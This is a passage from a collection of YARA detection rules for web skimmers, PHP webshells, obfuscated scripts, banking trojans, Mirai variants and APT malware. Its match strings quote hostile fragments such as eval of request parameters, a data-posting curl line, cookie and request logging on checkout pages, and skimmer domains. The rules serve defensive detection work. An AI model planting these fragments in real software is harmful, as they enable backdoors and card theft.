"($_=@$_REQUEST[q]).@$_($_REQUEST[z]);" condition: all of them } rule md5_d201d61510f7889f1a47257d52b15fa2 { strings: $ = "@eval(stripslashes($_REQUEST[q]));" condition: any of them } rule md5_06e3ed58854daeacf1ed82c56a883b04 { strings: $ = "$log_entry = serialize($ARINFO)" condition: any of them } rule md5_28690a72362e021f65bb74eecc54255e { strings: $ = "curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query(array('data'=>$data,'utmp'=>$id)));" condition: any of them } rule overwrite_globals_hack { strings: $ = /\$GLOBALS\['[^']{,20}'\]=Array\(/ condition: any of them } rule md5_4adef02197f50b9cc6918aa06132b2f6 { /* { eval($cco37(${ $kasd1}[ 'n46b398' ] ) );} */ strings: $ = /\{\s*eval\s*\(\s*\$.{1,5}\s*\(\$\{\s*\$.{1,5}\s*\}\[\s*'.{1,10}'\s*\]\s*\)\s*\);\}/ condition: any of them } rule obfuscated_globals { /* $GLOBALS['y63581'] = "\x43 */ strings: $ = /\$GLOBALS\['.{1,10}'\] = "\\x/ condition: any of them } rule ld_preload_backdoor { strings: $ = "killall -9 \".basename(\"/usr/bin/host" condition: any of them } rule fake_magentoupdate_site { strings: $ = "magentopatchupdate.com" condition: any of them } rule md5_b3ee7ea209d2ff0d920dfb870bad8ce5 { strings: $ = /\$mysql_key\s*=\s*@?base64_decode/ $ = /eval\(\s*\$mysql_key\s*\)/ condition: all of them } rule md5_e03b5df1fa070675da8b6340ff4a67c2 { strings: $ = /if\(preg_match\("\/onepage\|admin\/",\s*\$_SERVER\['REQUEST_URI'\]\)\)\{\s*@?file_put_contents/ $ = /@?base64_encode\(serialize\(\$_REQUEST\)\."--"\.serialize\(\$_COOKIE\)\)\."\\n",\s*FILE_APPEND\)/ condition: any of them } rule md5_023a80d10d10d911989e115b477e42b5 { strings: $ = /chr\(\d{,3}\)\.\"\"\.chr\(\d{,3}\)/ condition: any of them } rule md5_4aa900ddd4f1848a15c61a9b7acd5035 { strings: $ = "'base'.(128/2).'_de'.'code'" condition: any of them } rule md5_f797dd5d8e13fe5c8898dbe3beb3cc5b { strings: $ = "echo(\"FILE_Bad\");" condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* ref : https://github.com/gwillem/magento-malware-scanner author : https://github.com/gwillem */ rule onepage_or_checkout { strings: $ = "\\x6F\\x6E\\x65\\x70\\x61\\x67\\x65\\x7C\\x63\\x68\\x65\\x63\\x6B\\x6F\\x75\\x74" condition: any of them } rule sinlesspleasure_com { strings: $ = "5e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92" condition: any of them } rule amasty_biz { strings: $ = "118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117" condition: any of them } rule amasty_biz_js { strings: $ = "t_p#0.qlb#0.#1Blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0" condition: any of them } rule returntosender { strings: $ = "\\x2F\\x6D\\x65\\x64\\x69\\x61\\x2F\\x63\\x61\\x74\\x61\\x6C\\x6F\\x67\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x2F\\x63\\x61\\x63\\x68\\x65\\x2F\\x31\\x2F\\x74\\x68\\x75\\x6D\\x62\\x6E\\x61\\x69\\x6C\\x2F\\x37\\x30\\x30\\x78\\x2F\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2F\\x42\\x2F\\x57\\x2F\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2E\\x70\\x68\\x70" condition: any of them } rule ip_5uu8_com { strings: $ = "\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d" condition: any of them } rule cloudfusion_me { strings: $ = "&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;" condition: any of them } rule grelos_v { strings: $ = "var grelos_v" condition: any of them } rule hacked_domains { strings: $ = "infopromo.biz" $ = "jquery-code.su" $ = "jquery-css.su" $ = "megalith-games.com" $ = "cdn-cloud.pw" $ = "animalzz921.pw" $ = "statsdot.eu" condition: any of them } rule mage_cdn_link { strings: $ = "\\x6D\\x61\\x67\\x65\\x2D\\x63\\x64\\x6E\\x2E\\x6C\\x69\\x6E\\x6B" condition: any of them } rule credit_card_regex { strings: $ = "RegExp(\"[0-9]{13,16}\")" condition: any of them } rule jquery_code_su { strings: $ = "105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101" condition: any of them } rule jquery_code_su_multi { strings: $ = "=oQKpkyJ8dCK0lGbwNnLn42bpRXYj9GbENDft12bkBjM8V2Ypx2c8Rnbl52bw12bDlkUVVGZvNWZkZ0M85WavpGfsJXd8R1UPB1NywXZtFmb0N3box" condition: any of them } rule Trafficanalyzer_js { strings: $ = "z=x['length'];for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)-10) }w=this['unescape'](y);this['eval'](w);" condition: any of them } rule atob_js { strings: $ = "this['eval'](this['atob']('" condition: any of them } rule gate_php_js { /* token=KjsS29Msl&host= */ strings: $ = /\/gate.php\?token=.{,10}&host=/ condition: any of them } rule googieplay_js { strings: $ = "tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?" condition: any of them } rule mag_php_js { strings: $ = "onepage|checkout|onestep|firecheckout|onestepcheckout" $ = "'one|check'" condition: any of them } rule thetech_org_js { strings: $ = "|RegExp|onepage|checkout|" condition: any of them } rule md5_cdn_js_link_js { strings: $ = "grelos_v= null" condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* ref : https://github.com/gwillem/magento-malware-scanner/ author : https://github.com/gwillem */ rule fromCharCode_in_unicode { strings: $ = "\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065" condition: any of them and filesize < 500KB } rule function_through_object { strings: $ = "['eval']" $ = "['unescape']" $ = "['charCodeAt']" $ = "['fromCharCode']" condition: any of them and filesize < 500KB } rule hex_script { strings: $ = "\\x73\\x63\\x72\\x69\\x70\\x74\\x22" condition: any of them and filesize < 500KB } rule php_malfunctions { strings: $ = "eval(" $ = "gzinflate(" $ = "str_rot13(" $ = "base64_decode(" condition: 3 of them and filesize < 500KB } rule php_obf_malfunctions { strings: $ = "eval(base64_decode" $ = "eval(gzinflate" $ = "str_rot13(base64_decode" condition: any of them and filesize < 500KB } rule fopo_obfuscator { strings: $ = "www.fopo.com.ar" condition: any of them and filesize < 500KB } rule obf_base64_decode { strings: $ = "\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145" condition: any of them and filesize < 500KB } rule html_upload { strings: $ = "<input type='submit' name='upload' value='upload'>" $ = "if($_POST['upload'])" condition: any of them and filesize < 500KB } rule php_uname { strings: $ = "php_uname()" condition: any of them and filesize < 500KB } rule scriptkiddies { strings: $ = "lastc0de@Outlook.com" nocase $ = "CodersLeet" nocase $ = "AgencyCaFc" nocase $ = "IndoXploit" nocase $ = "Kapaljetz666" nocase condition: any of them and filesize < 500KB } rule eval_with_comments { strings: $ = /(^|\s)eval\s*\/\*.{,128}\*\/\s*\(/ condition: any of them and filesize < 500KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Description: This rule keys on email headers that may have been sent from a malicious PHP script on a compromised webserver. Priority: 4 Scope: Against Email Tags: None Author: P.Burbage Created in PhishMe's Triage on September 1, 2015 1:43 PM */ rule PM_Email_Sent_By_PHP_Script { strings: $php1="X-PHP-Script" fullword $php2="X-PHP-Originating-Script" fullword $php3="/usr/bin/php" fullword condition: any of them } /* Description: Hits on ZIP attachments that contain *.js or *.jse - usually JS Dropper malware that has downloaded Kovter & Boaxee in the past. Priority: 5 Scope: Against Attachment Tags: FileID Author: P.Burbage Created in PhishMe's Triage on September 1, 2015 1:43 PM */ rule PM_Zip_with_js { strings: $hdr="PK" $e1=".js" nocase $e2=".jse" nocase condition: $hdr at 0 and (($e1 in (filesize-100..filesize)) or ($e2 in (filesize-100..filesize))) } rule MedussaHTTP_2019 { meta: author = "J from THL <j@techhelplist.com>" date = "2019-08-12" reference1 = "https://app.any.run/tasks/68c8f400-eba5-4d6c-b1f1-8b07d4c014a4/" reference2 = "https://www.netscout.com/blog/asert/medusahttp-ddos-slithers-back-spotlight" reference3 = "https://twitter.com/malware_traffic/status/1161034462983008261" version = 1 maltype = "Bot" filetype = "memory" description = "MedussaHTTP v20190812" strings: $text01 = "|check|" ascii $text02 = "POST!" ascii $text03 = "httpactive" ascii $text04 = "httpstrong" ascii $text05 = "httppost" ascii $text06 = "slavicdragon" ascii $text07 = "slavicnodragon" ascii $text08 = "smartflood" ascii $text09 = "stop-all" ascii $text10 = "botkill" ascii $text11 = "updatehash" ascii $text12 = "xyz=" ascii $text13 = "abc=" ascii condition: 9 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Trojan_W32_Gh0stMiancha_1_0_0 { meta: Author = "Context Threat Intelligence" Date = "2014/01/27" Description = "Bytes inside" Reference = "http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" strings: $0x = { 57 5b 5a 5a 51 57 40 34 31 67 2e 31 70 34 5c 40 40 44 3b 25 3a 19 1e 5c 7b 67 60 2e 34 31 67 2e 31 70 19 1e 55 77 77 71 64 60 2e 34 3e 3b 3e 19 1e 57 7b 7a 60 71 7a 60 39 40 6d 64 71 2e 34 60 71 6c 60 3b 7c 60 79 78 19 1e 44 66 7b 6c 6d 39 57 7b 7a 7a 71 77 60 7d 7b 7a 2e 34 5f 71 71 64 39 55 78 7d 62 71 19 1e 57 7b 7a 60 71 7a 60 39 78 71 7a 73 60 7c 2e 34 24 19 1e 19 1e } $1 = { 5c e7 99 bd e5 8a a0 e9 bb 91 5c } $1x = { 48 f3 8d a9 f1 9e b4 fd af 85 48 } $2 = "DllCanLoadNow" $2x = { 50 78 78 57 75 7a 58 7b 75 70 5a 7b 63 } $3x = { 5a 61 79 76 71 66 34 7b 72 34 67 61 76 7f 71 6d 67 2e 34 31 70 } $4 = "JXNcc2hlbGxcb3Blblxjb21tYW5k" $4x = { 5e 4c 5a 77 77 26 7c 78 76 53 6c 77 76 27 56 78 76 78 6c 7e 76 26 25 60 4d 43 21 7f } $5 = "SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==" $5x = { 47 51 52 47 46 52 70 56 41 7f 42 77 46 51 42 40 45 25 5e 5e 41 52 46 5e 40 24 21 77 41 27 78 6e 70 53 42 60 4c 51 5a 78 76 7a 46 6d 4d 43 6c 45 77 79 2d 7e 4e 4c 5a 6e 76 27 5e 77 59 55 29 29 } $6 = "C:\\Users\\why\\" $6x = { 57 2e 48 41 67 71 66 67 48 63 7c 6d 48 } $7 = "g:\\ykcx\\" $7x = { 73 2E 48 6D 7F 77 6C 48 } $8 = "(miansha)" $8x = { 3C 79 7D 75 7A 67 7C 75 3D } $9 = "server(\xE5\xA3\xB3)" $9x = { 7C 2E 48 26 24 25 27 3A 25 25 3A 26 21 48 67 71 66 62 71 66 3C F1 B7 A7 3D 48 46 71 78 71 75 67 71 48 67 71 66 62 71 66 3A 64 70 76 } $cfgDecode = { 8a ?? ?? 80 c2 7a 80 f2 19 88 ?? ?? 41 3b ce 7c ??} condition: any of them } rule MiniAsp3_mem : memory { meta: author = "chort (@chort0)" description = "Detect MiniASP3 in memory" strings: $pdb = "MiniAsp3\\Release\\MiniAsp.pdb" fullword $httpAbout = "http://%s/about.htm" fullword $httpResult = "http://%s/result_%s.htm" fullword $msgInetFail = "open internet failed…" fullword $msgRunErr = "run error!" fullword $msgRunOk = "run ok!" fullword $msgTimeOutM0 = "time out,change to mode 0" fullword $msgCmdNull = "command is null!" fullword condition: ($pdb and (all of ($http*)) and any of ($msg*)) } /* Yara rule to detect Mirai Okiru generic This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Mirai_Okiru { meta: description = "Detects Mirai Okiru MALW" reference = "https://www.reddit.com/r/LinuxMalware/comments/7p00i3/quick_notes_for_okiru_satori_variant_of_mirai/" date = "2018-01-05" strings: $hexsts01 = { 68 7f 27 70 60 62 73 3c 27 28 65 6e 69 28 65 72 } $hexsts02 = { 74 7e 65 68 7f 27 73 61 73 77 3c 27 28 65 6e 69 } // noted some Okiru variant doesnt have below function, uncomment to seek specific x86 bins // $st07 = "iptables -F\n" fullword nocase wide ascii condition: all of them and is__elf and is__Mirai_gen7 and filesize < 100KB } /* Yara rule to detect Mirai Satori generic This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ private rule is__Mirai_Satori_gen { meta: description = "Detects Mirai Satori_gen" reference = "https://www.reddit.com/r/LinuxMalware/comments/7p00i3/quick_notes_for_okiru_satori_variant_of_mirai/" date = "2018-01-05" strings: $st08 = "tftp -r satori" fullword nocase wide ascii $st09 = "/bins/satori" fullword nocase wide ascii $st10 = "satori" fullword nocase wide ascii $st11 = "SATORI" fullword nocase wide ascii condition: 2 of them } rule Mirai_Satori { meta: description = "Detects Mirai Satori MALW" date = "2018-01-09" strings: $hexsts01 = { 63 71 75 ?? 62 6B 77 62 75 } $hexsts02 = { 53 54 68 72 75 64 62 } $hexsts03 = { 28 63 62 71 28 70 66 73 64 6F 63 68 60 } condition: all of them and is__elf and is__Mirai_gen7 and is__Mirai_Satori_gen and filesize < 100KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule tran_duy_linh { meta: author = "@patrickrolsen" maltype = "Misc." version = "0.2" reference = "8fa804105b1e514e1998e543cd2ca4ea, 872876cfc9c1535cd2a5977568716ae1, etc." date = "01/03/2014" strings: $doc = {D0 CF 11 E0} //DOCFILE0 $string1 = "Tran Duy Linh" fullword $string2 = "DLC Corporation" fullword condition: ($doc at 0) and (all of ($string*)) } rule misc_iocs { meta: author = "@patrickrolsen" maltype = "Misc." version = "0.1" reference = "N/A" strings: $doc = {D0 CF 11 E0} //DOCFILE0 $s1 = "dw20.exe" $s2 = "cmd /" condition: ($doc at 0) and (1 of ($s*)) } rule malicious_LNK_files { meta: author = "@patrickrolsen" strings: $magic = {4C 00 00 00 01 14 02 00} // L....... $s1 = "\\RECYCLER\\" wide $s2 = "%temp%" wide $s3 = "%systemroot%\\system32\\cmd.exe" wide //$s4 = "./start" wide $s5 = "svchost.exe" wide $s6 = "lsass.exe" wide $s7 = "csrss.exe" wide $s8 = "winlogon.exe" wide //$s9 = "%cd%" wide $s10 = "%appdata%" wide $s11 = "%programdata%" wide $s12 = "%localappdata%" wide $s13 = ".cpl" wide condition: ($magic at 0) and any of ($s*) } rule memory_pivy { meta: author = "https://github.com/jackcr/" strings: $a = {00 00 00 00 00 00 00 00 00 00 00 53 74 75 62 50 61 74 68 00} // presence of pivy in memory condition: any of them } rule memory_shylock { meta: author = "https://github.com/jackcr/" strings: $a = /pipe\\[A-F0-9]{32}/ //Named pipe created by the malware $b = /id=[A-F0-9]{32}/ //Portion or the uri beacon $c = /MASTER_[A-F0-9]{32}/ //Mutex created by the malware $d = "***Load injects by PIPE (%s)" //String found in binary $e = "***Load injects url=%s (%s)" //String found in binary $f = "*********************** Ping Ok ************************" //String found in binary $g = "*** LOG INJECTS *** %s" //String found in binary condition: any of them } rule ScanBox_Malware_Generic { meta: description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP" author = "Florian Roth" reference1 = "http://goo.gl/MUUfjv" reference2 = "http://goo.gl/WXUQcP" date = "2015/02/28" hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9" hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d" hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2" strings: /* Sample 1 */ $s0 = "http://142.91.76.134/p.dat" fullword ascii $s1 = "HttpDump 1.1" fullword ascii /* Sample 2 */ $s3 = "SecureInput .exe" fullword wide $s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii /* Sample 3 */ $s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii $s6 = "ServiceMaix" fullword ascii /* Certificate and Keywords */ $x1 = "Management Support Team1" fullword ascii $x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii $x3 = "SEOUL1" fullword ascii condition: ( 1 of ($s*) and 2 of ($x*) ) or ( 3 of ($x*) ) } rule TrojanDownloader { meta: description = "Trojan Downloader - Flash Exploit Feb15" author = "Florian Roth" reference = "http://goo.gl/wJ8V1I" date = "2015/02/11" hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e" score = 60 strings: $x1 = "Hello World!" fullword ascii $x2 = "CONIN$" fullword ascii $s6 = "GetCommandLineA" fullword ascii $s7 = "ExitProcess" fullword ascii $s8 = "CreateFileA" fullword ascii $s5 = "SetConsoleMode" fullword ascii $s9 = "TerminateProcess" fullword ascii $s10 = "GetCurrentProcess" fullword ascii $s11 = "UnhandledExceptionFilter" fullword ascii $s3 = "user32.dll" fullword ascii $s16 = "GetEnvironmentStrings" fullword ascii $s2 = "GetLastActivePopup" fullword ascii $s17 = "GetFileType" fullword ascii $s19 = "HeapCreate" fullword ascii $s20 = "VirtualFree" fullword ascii $s21 = "WriteFile" fullword ascii $s22 = "GetOEMCP" fullword ascii $s23 = "VirtualAlloc" fullword ascii $s24 = "GetProcAddress" fullword ascii $s26 = "FlushFileBuffers" fullword ascii $s27 = "SetStdHandle" fullword ascii $s28 = "KERNEL32.dll" fullword ascii condition: $x1 and $x2 and ( all of ($s*) ) and filesize < 35000 } rule Cloaked_as_JPG { meta: description = "Detects a cloaked file as JPG" author = "Florian Roth (eval section from Didier Stevens)" date = "2015/02/29" score = 70 strings: $ext = "extension: .jpg" condition: $ext and uint16be(0x00) != 0xFFD8 } rule rtf_yahoo_ken { meta: author = "@patrickrolsen" maltype = "Yahoo Ken" filetype = "RTF" version = "0.1" description = "Test rule" date = "2013-12-14" strings: $magic1 = { 7b 5c 72 74 30 31 } // {\rt01 $magic2 = { 7b 5c 72 74 66 31 } // {\rtf1 $magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3 $author1 = { 79 61 68 6f 6f 20 6b 65 63 } // "yahoo ken" condition: ($magic1 or $magic2 or $magic3 at 0) and $author1 } rule ZXProxy { meta: author = "ThreatConnect Intelligence Research Team" strings: $C = "\\Control\\zxplug" nocase wide ascii $h = "http://www.facebook.com/comment/update.exe" wide ascii $S = "Shared a shell to %s:%s Successfully" nocase wide ascii condition: any of them } rule OrcaRAT { meta: Author = "PwC Cyber Threat Operations" Date = "2014/10/20" Description = "Strings inside" Reference = "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" strings: $MZ = "MZ" $apptype1 = "application/x-ms-application" $apptype2 = "application/x-ms-xbap" $apptype3 = "application/vnd.ms-xpsdocument" $apptype4 = "application/xaml+xml" $apptype5 = "application/x-shockwave-flash" $apptype6 = "image/pjpeg" $err1 = "Set return time error = %d!" $err2 = "Set return time success!" $err3 = "Quit success!" condition: $MZ at 0 and filesize < 500KB and (all of ($apptype*) and 1 of ($err*)) } rule EmiratesStatement { meta: Author = "Christiaan Beek" Date = "2013-06-30" Description = "Credentials Stealing Attack" Reference = "https://blogs.mcafee.com/mcafee-labs/targeted-campaign-steals-credentials-in-gulf-states-and-caribbean" hash0 = "0e37b6efe5de1cc9236017e003b1fc37" hash1 = "a28b22acf2358e6aced43a6260af9170" hash2 = "6f506d7adfcc2288631ed2da37b0db04" hash3 = "8aebade47dc1aa9ac4b5625acf5ade8f" strings: $string0 = "msn.klm" $string1 = "wmsn.klm" $string2 = "bms.klm" condition: all of them } rule PUP_InstallRex_AntiFWb { meta: description = "Malware InstallRex / AntiFW" author = "Florian Roth" date = "2015-05-13" hash = "bb5607cd2ee51f039f60e32cf7edc4e21a2d95cd" score = 65 strings: $s4 = "Error %u while loading TSU.DLL %ls" fullword ascii $s7 = "GetModuleFileName() failed => %u" fullword ascii $s8 = "TSULoader.exe" fullword wide $s15 = "\\StringFileInfo\\%04x%04x\\Arguments" fullword wide $s17 = "Tsu%08lX.dll" fullword wide condition: uint16(0) == 0x5a4d and all of them } rule LightFTP_fftp_x86_64 { meta: description = "Detects a light FTP server" author = "Florian Roth" reference = "https://github.com/hfiref0x/LightFTP" date = "2015-05-14" hash1 = "989525f85abef05581ccab673e81df3f5d50be36" hash2 = "5884aeca33429830b39eba6d3ddb00680037faf4" score = 50 strings: $s1 = "fftp.cfg" fullword wide $s2 = "220 LightFTP server v1.0 ready" fullword ascii $s3 = "*FTP thread exit*" fullword wide $s4 = "PASS->logon successful" fullword ascii $s5 = "250 Requested file action okay, completed." fullword ascii condition: uint16(0) == 0x5a4d and filesize < 250KB and 4 of them } rule LightFTP_Config { meta: description = "Detects a light FTP server - config file" author = "Florian Roth" reference = "https://github.com/hfiref0x/LightFTP" date = "2015-05-14" hash = "ce9821213538d39775af4a48550eefa3908323c5" strings: $s2 = "maxusers=" wide $s6 = "[ftpconfig]" fullword wide $s8 = "accs=readonly" fullword wide $s9 = "[anonymous]" fullword wide $s10 = "accs=" fullword wide $s11 = "pswd=" fullword wide condition: uint16(0) == 0xfeff and filesize < 1KB and all of them } rule SpyGate_v2_9 { meta: date = "2014/09" maltype = "Spygate v2.9 Remote Access Trojan" filetype = "exe" reference = "https://blogs.mcafee.com/mcafee-labs/middle-east-developer-spygate-struts-stuff-online" strings: $1 = "shutdowncomputer" wide $2 = "shutdown -r -t 00" wide $3 = "blockmouseandkeyboard" wide $4 = "ProcessHacker" $5 = "FileManagerSplit" wide condition: all of them } rule ice_ix_12xy : banker { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "ICE-IX 1.2.x.y trojan banker" date = "2013-01-12" filetype = "memory" version = "1.0" strings: $regexp1= /bn1=.{32}&sk1=[0-9a-zA-Z]{32}/ $a = "bn1=" $b = "&sk1=" $c = "mario" //HardDrive GUID artifact $d = "FIXME" $e = "RFB 003.003" //VNC artifact $ggurl = "http://www.google.com/webhp" condition: $regexp1 or ($a and $b) or all of ($c,$d,$e,$ggurl) } rule qadars : banker { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "Qadars - Mobile part. Maybe Perkele." version = "1.0" filetype = "memory" ref1 = "http://www.lexsi-leblog.fr/cert/qadars-nouveau-malware-bancaire-composant-mobile.html" strings: $cmd1 = "m?D" $cmd2 = "m?S" $cmd3 = "ALL" $cmd4 = "FILTER" $cmd5 = "NONE" $cmd6 = "KILL" $cmd7 = "CANCEL" $cmd8 = "SMS" $cmd9 = "DIVERT" $cmd10 = "MESS" $nofilter = "nofilter1111111" $botherderphonenumber1 = "+380678409210" condition: all of ($cmd*) or $nofilter or any of ($botherderphonenumber*) } rule shylock : banker { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "Shylock Banker" date = "2013-12-12" version = "1.0" ref1 = "http://iocbucket.com/iocs/1b4660d57928df5ca843c21df0b2adb117026cba" ref2 = "http://www.trusteer.com/blog/merchant-fraud-returns-%E2%80%93-shylock-polymorphic-financial-malware-infections-rise" ref3 = "https://www.csis.dk/en/csis/blog/3811/" strings: $process1 = "MASTER" $process2 = "_SHUTDOWN" $process3 = "EVT_VNC" $process4 = "EVT_BACK" $process5 = "EVT_VNC" $process6 = "IE_Hook::GetRequestInfo" $process7 = "FF_Hook::getRequestInfo" $process8 = "EX_Hook::CreateProcess" $process9 = "hijackdll.dll" $process10 = "MTX_" $process11 = "FF::PR_WriteHook entry" $process12 = "FF::PR_WriteHook exit" $process13 = "HijackProcessAttach::*** MASTER *** MASTER *** MASTER *** %s PID=%u" $process14 = "HijackProcessAttach::entry" $process15 = "FF::BEFORE INJECT" $process16 = "FF::AFTER INJECT" $process17 = "IE::AFTER INJECT" $process18 = "IE::BEFORE INJECT" $process19 = "*** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** %s" $process20 = "*** LOG INJECTS *** %s" $process21 = "*** inject to process %s not allowed" $process22 = "*** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** %s" $process23 = ".?AVFF_Hook@@" $process24 = ".?AVIE_Hook@@" $process25 = "Inject::InjectDllFromMemory" $process26 = "BadSocks.dll" $domain1 = "extensadv.cc" $domain2 = "topbeat.cc" $domain3 = "brainsphere.cc" $domain4 = "commonworldme.cc" $domain5 = "gigacat.cc" $domain6 = "nw-serv.cc" $domain7 = "paragua-analyst.cc" condition: 3 of ($process*) or any of ($domain*) } rule spyeye : banker { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "SpyEye X.Y memory" date = "2012-05-23" version = "1.0" filetype = "memory" strings: $spyeye = "SpyEye" $a = "%BOTNAME%" $b = "globplugins" $c = "data_inject" $d = "data_before" $e = "data_after" $f = "data_end" $g = "bot_version" $h = "bot_guid" $i = "TakeBotGuid" $j = "TakeGateToCollector" $k = "[ERROR] : Omfg! Process is still active? Lets kill that mazafaka!" $l = "[ERROR] : Update is not successfull for some reason" $m = "[ERROR] : dwErr == %u" $n = "GRABBED DATA" condition: $spyeye or (any of ($a,$b,$c,$d,$e,$f,$g,$h,$i,$j,$k,$l,$m,$n)) } rule spyeye_plugins : banker { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "SpyEye X.Y Plugins memory" date = "2012-05-23" version = "1.0" filetype = "memory" strings: $a = "webfakes.dll" $b = "config.dat" //may raise some FP $c = "collectors.txt" $d = "webinjects.txt" $e = "screenshots.txt" $f = "billinghammer.dll" $g = "block.dll" //may raise some FP $h = "bugreport.dll" //may raise some FP $i = "ccgrabber.dll" $j = "connector2.dll" $k = "creditgrab.dll" $l = "customconnector.dll" $m = "ffcertgrabber.dll" $n = "ftpbc.dll" $o = "rdp.dll" //may raise some FP $p = "rt_2_4.dll" $q = "socks5.dll" //may raise some FP $r = "spySpread.dll" $s = "w2chek4_4.dll" $t = "w2chek4_6.dll" condition: any of them } rule callTogether_certificate { meta: Author = "Fireeye Labs" Date = "2014/11/03" Description = "detects binaries signed with the CallTogether certificate" Reference = "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" strings: $serial = { 45 21 56 C3 B3 FB 01 76 36 5B DB 5B 77 15 BC 4C } $o = "CallTogether, Inc." condition: $serial and $o } rule qti_certificate { meta: Author = "Fireeye Labs" Date = "2014/11/03" Description = "detects binaries signed with the QTI International Inc certificate" Reference = "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" strings: $cn = "QTI International Inc" $serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 } condition: $cn and $serial } rule DownExecute_A { meta: Author = "PwC Cyber Threat Operations :: @tlansec" Date = "2015/04/27" Description = "Malware is often wrapped/protected, best to run on memory" Reference = "http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html" strings: $winver1 = "win 8.1" $winver2 = "win Server 2012 R2" $winver3 = "win Srv 2012" $winver4 = "win srv 2008 R2" $winver5 = "win srv 2008" $winver6 = "win vsta" $winver7 = "win srv 2003 R2" $winver8 = "win hm srv" $winver9 = "win Strg srv 2003" $winver10 = "win srv 2003" $winver11 = "win XP prof x64 edt" $winver12 = "win XP" $winver13 = "win 2000" $pdb1 = "D:\\Acms\\2\\docs\\Visual Studio 2013\\Projects\\DownloadExcute\\DownloadExcute\\Release\\DownExecute.pdb" $pdb2 = "d:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\writer.h" $pdb3 = ":\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\internal/stack.h" $pdb4 = "\\downloadexcute\\downexecute\\" $magic1 = "<Win Get Version Info Name Error" $magic2 = "P@$sw0rd$nd" $magic3 = "$t@k0v2rF10w" $magic4 = "|*|123xXx(Mutex)xXx321|*|6-21-2014-03:06PM" wide $str1 = "Download Excute" ascii wide fullword $str2 = "EncryptorFunctionPointer %d" $str3 = "%s\\%s.lnk" $str4 = "Mac:%s-Cpu:%s-HD:%s" $str5 = "feed back responce of host" $str6 = "GET Token at host" $str7 = "dwn md5 err" condition: all of ($winver*) or any of ($pdb*) or any of ($magic*) or 2 of ($str*) } rule CVE_2015_1674_CNGSYS { meta: description = 